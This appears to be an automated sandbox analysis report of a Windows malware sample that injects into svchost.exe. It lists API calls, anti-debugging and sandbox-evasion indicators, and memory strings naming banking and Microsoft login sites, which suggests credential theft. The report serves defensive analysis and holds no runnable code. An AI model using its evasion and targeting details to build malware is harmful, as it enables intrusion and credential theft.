                Source: Binary string: wntdll.pdbUGP source: RO2Y11yOJ7.exe, 00000002.00000003.1294048871.0000000004080000.00000004.00001000.00020000.00000000.sdmp, RO2Y11yOJ7.exe, 00000002.00000003.1303559485.0000000004270000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1571063757.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1572919934.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1677617777.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1675363107.00000000044E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RO2Y11yOJ7.exe, 00000002.00000003.1294048871.0000000004080000.00000004.00001000.00020000.00000000.sdmp, RO2Y11yOJ7.exe, 00000002.00000003.1303559485.0000000004270000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.1675823650.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1675823650.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1571063757.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1572919934.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, Atuserer.exe, 00000007.00000002.3164055528.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3164055528.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1677617777.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1675363107.00000000044E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3165412212.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744457966.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2018937107.0000000031E2C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ATuserer.pdbGCTL source: svchost.exe, 00000004.00000003.1643151077.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1643067119.000000000281B000.00000004.00000020.00020000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3158765250.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3165412212.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744457966.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2018937107.0000000031E2C000.00000004.80000000.00040000.00000000.sdmp
                Source: RO2Y11yOJ7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RO2Y11yOJ7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: RO2Y11yOJ7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RO2Y11yOJ7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RO2Y11yOJ7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003BC104 LoadLibraryA,GetProcAddress,2_2_003BC104
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034C590 push eax; retn 0034h2_2_0034C599
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00368AC5 push ecx; ret 2_2_00368AD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004CD943 push edi; iretd 4_2_004CD944
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C1921 push ebx; ret 4_2_004C192D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D418E push ds; ret 4_2_004D41B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C2192 push ss; retf 4_2_004C219A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D9247 pushfd ; ret 4_2_004D9248
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D1A08 push es; ret 4_2_004D1BFF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004CDA80 push ebp; ret 4_2_004CDA83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D1B71 push es; ret 4_2_004D1BFF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004CD39A push edi; retf 4_2_004CD39B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004CD5F1 push ebx; retf 4_2_004CD65A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C3580 push eax; ret 4_2_004C3582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004DAE19 push es; retf 4_2_004DAE28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F0225F pushad ; ret 4_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F027FA pushad ; ret 4_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F0283D push eax; iretd 4_2_02F02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F309AD push ecx; mov dword ptr [esp], ecx4_2_02F309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F01368 push eax; iretd 4_2_02F01369
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048B09AD push ecx; mov dword ptr [esp], ecx7_2_048B09B6
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008322BD push 6EA33E55h; retf 7_2_008322D4
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0082E485 push es; ret 7_2_0082E67C
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0082E5EE push es; ret 7_2_0082E67C
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00830C0B push ds; ret 7_2_00830C35
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00843289 pushfd ; ret 7_2_0084328E
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008413F8 push es; ret 7_2_0084140A
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00837896 push es; retf 7_2_008378A5
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00843837 push eax; retf 7_2_00843852
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00835CC4 pushfd ; ret 7_2_00835CC5
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00839E58 push esp; retf 7_2_00839E5A
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_046D74A8 push cs; iretd 7_2_046D74AC
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00344A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00344A35
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003C53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_003C53DF
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00363307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00363307
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeAPI/Special instruction interceptor: Address: 24E3234
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F7096E rdtsc 4_2_02F7096E
                Source: C:\Windows\SysWOW64\Atuserer.exeWindow / User API: threadDelayed 9332Jump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeWindow / User API: threadDelayed 640Jump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeAPI coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\Atuserer.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\Atuserer.exe TID: 1240Thread sleep count: 9332 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exe TID: 1240Thread sleep time: -18664000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exe TID: 1240Thread sleep count: 640 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exe TID: 1240Thread sleep time: -1280000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe TID: 5836Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe TID: 5836Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\Atuserer.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A449B GetFileAttributesW,FindFirstFileW,FindClose,2_2_003A449B
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AC75D FindFirstFileW,FindClose,2_2_003AC75D
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_003AC7E8
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003AF021
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003AF17E
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003AF47F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_003A3833
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_003A3B56
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003ABD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003ABD48
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0083C4F0 FindFirstFileW,FindNextFileW,FindClose,7_2_0083C4F0
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00344AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00344AFE
                Source: 00X412J3.7.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 00X412J3.7.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: 00X412J3.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 00X412J3.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 00X412J3.7.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 00X412J3.7.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: 00X412J3.7.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: avRLXQyosx.exe, 00000008.00000002.3161015681.000000000114F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                Source: 00X412J3.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 00X412J3.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 00X412J3.7.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 00X412J3.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 00X412J3.7.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 00X412J3.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 00X412J3.7.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 00X412J3.7.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: firefox.exe, 0000000C.00000002.2020563070.000002CCF1D4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM
                Source: 00X412J3.7.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: 00X412J3.7.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: 00X412J3.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 00X412J3.7.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 00X412J3.7.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 00X412J3.7.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 00X412J3.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 00X412J3.7.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 00X412J3.7.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 00X412J3.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 00X412J3.7.drBinary or memory string: global block list test formVMware20,11696501413
                Source: 00X412J3.7.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 00X412J3.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 00X412J3.7.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 00X412J3.7.drBinary or memory string: discord.comVMware20,11696501413f
                Source: 00X412J3.7.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F7096E rdtsc 4_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D7A13 LdrLoadDll,4_2_004D7A13
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B401F BlockInput,2_2_003B401F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00343B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_00343B4C
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00375BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_00375BFC
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003BC104 LoadLibraryA,GetProcAddress,2_2_003BC104
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_024E34A0 mov eax, dword ptr fs:[00000030h]2_2_024E34A0
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_024E3500 mov eax, dword ptr fs:[00000030h]2_2_024E3500
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_024E1E70 mov eax, dword ptr fs:[00000030h]2_2_024E1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F402E1 mov eax, dword ptr fs:[00000030h]4_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F402E1 mov eax, dword ptr fs:[00000030h]4_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F402E1 mov eax, dword ptr fs:[00000030h]4_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03008324 mov eax, dword ptr fs:[00000030h]4_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03008324 mov ecx, dword ptr fs:[00000030h]4_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03008324 mov eax, dword ptr fs:[00000030h]4_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03008324 mov eax, dword ptr fs:[00000030h]4_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]4_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]4_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]4_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]4_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]4_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0300634F mov eax, dword ptr fs:[00000030h]4_2_0300634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F402A0 mov eax, dword ptr fs:[00000030h]4_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F402A0 mov eax, dword ptr fs:[00000030h]4_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC62A0 mov eax, dword ptr fs:[00000030h]4_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]4_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC62A0 mov eax, dword ptr fs:[00000030h]4_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC62A0 mov eax, dword ptr fs:[00000030h]4_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC62A0 mov eax, dword ptr fs:[00000030h]4_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC62A0 mov eax, dword ptr fs:[00000030h]4_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E284 mov eax, dword ptr fs:[00000030h]4_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E284 mov eax, dword ptr fs:[00000030h]4_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB0283 mov eax, dword ptr fs:[00000030h]4_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB0283 mov eax, dword ptr fs:[00000030h]4_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB0283 mov eax, dword ptr fs:[00000030h]4_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0274 mov eax, dword ptr fs:[00000030h]4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34260 mov eax, dword ptr fs:[00000030h]4_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34260 mov eax, dword ptr fs:[00000030h]4_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34260 mov eax, dword ptr fs:[00000030h]4_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2826B mov eax, dword ptr fs:[00000030h]4_2_02F2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2A250 mov eax, dword ptr fs:[00000030h]4_2_02F2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36259 mov eax, dword ptr fs:[00000030h]4_2_02F36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEA250 mov eax, dword ptr fs:[00000030h]4_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEA250 mov eax, dword ptr fs:[00000030h]4_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB8243 mov eax, dword ptr fs:[00000030h]4_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB8243 mov ecx, dword ptr fs:[00000030h]4_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2823B mov eax, dword ptr fs:[00000030h]4_2_02F2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]4_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]4_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]4_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F663FF mov eax, dword ptr fs:[00000030h]4_2_02F663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h]4_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h]4_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h]4_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h]4_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h]4_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h]4_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h]4_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F403E9 mov eax, dword ptr fs:[00000030h]4_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE3DB mov eax, dword ptr fs:[00000030h]4_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE3DB mov eax, dword ptr fs:[00000030h]4_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]4_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDE3DB mov eax, dword ptr fs:[00000030h]4_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD43D4 mov eax, dword ptr fs:[00000030h]4_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD43D4 mov eax, dword ptr fs:[00000030h]4_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEC3CD mov eax, dword ptr fs:[00000030h]4_2_02FEC3CD
